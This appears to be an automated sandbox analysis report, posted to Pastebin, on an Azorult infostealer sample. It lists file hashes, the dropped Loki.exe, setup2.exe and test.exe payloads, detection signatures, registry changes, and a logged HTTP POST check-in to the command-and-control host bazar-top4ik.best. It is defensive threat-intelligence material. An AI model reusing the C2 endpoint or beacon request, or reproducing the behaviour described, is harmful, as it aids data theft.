Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Azorult"
- * MalScore: 10.0
- * File Name: "Exes_6dd6c0fb50575dbc60ecf613448ebf9d.exe"
- * File Size: 5051392
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "65e2691ab4f2bac652eac54f6e9ecdf6e8af048add3d8e4b5a460a9b20bf6ea8"
- * MD5: "6dd6c0fb50575dbc60ecf613448ebf9d"
- * SHA1: "b4ca1f863beda10a2540f293a0f22fad82c14b52"
- * SHA512: "e348b323b1d765d9a977261df3d23cd35d7cb2cf64b8ad16557c2521a86d0ded36ab6eda2c3864db5b511f3a49056a233e3d230a8ef175b57e31a51ee97cf9e0"
- * CRC32: "03EF2E17"
- * SSDEEP: "98304:y2cPK8EYBYW1KR2h/6796vOxkHxXkEfz/DCn5jo6zCQiWSa4Je:dCKRU1KRm/6BmRHpkE3Cn5Uov2e"
- * Process Execution:
- "Exes_6dd6c0fb50575dbc60ecf613448ebf9d.exe",
- "Loki.exe",
- "setup2.exe",
- "setup2.exe",
- "test.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\Loki.exe\"",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\Loki.exe ",
- "\"C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe\"",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe ",
- "\"C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\test.exe\"",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\test.exe "
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "setup2.exe, PID 2516"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\test.exe"
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe"
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\Loki.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "suspicious_request": "http://bazar-top4ik.best/index.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://bazar-top4ik.best/index.php"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .rsrc, entropy: 7.99, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00406e00, virtual_size: 0x00406da3"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "setup2.exe(292) -> setup2.exe(2516)"
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "target": "clamav:Win.Malware.Autoit-7090832-0, sha256:65e2691ab4f2bac652eac54f6e9ecdf6e8af048add3d8e4b5a460a9b20bf6ea8, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "dropped": "clamav:Win.Malware.Autoit-7090832-0, sha256:af7182ad65554c96ecb166847c9685d4edc65e9aace1655cad4bcfdb7f129dda , guest_paths:C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
- * Started Service:
- * Mutexes:
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut615F.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\Loki.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut63F0.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\setup2.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut6559.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Z1130426252\\test.exe"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut615F.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut63F0.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut6559.tmp"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- * DNS Communications:
- "type": "A",
- "request": "bazar-top4ik.best",
- "answers":
- "data": "104.27.172.200",
- "type": "A"
- "data": "104.27.173.200",
- "type": "A"
- * Domains:
- "ip": "104.27.172.200",
- "domain": "bazar-top4ik.best"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "uri": "http://bazar-top4ik.best/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "bazar-top4ik.best",
- "version": "1.1",
- "path": "/index.php",
- "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: bazar-top4ik.best\r\nContent-Length: 105\r\nCache-Control: no-cache\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement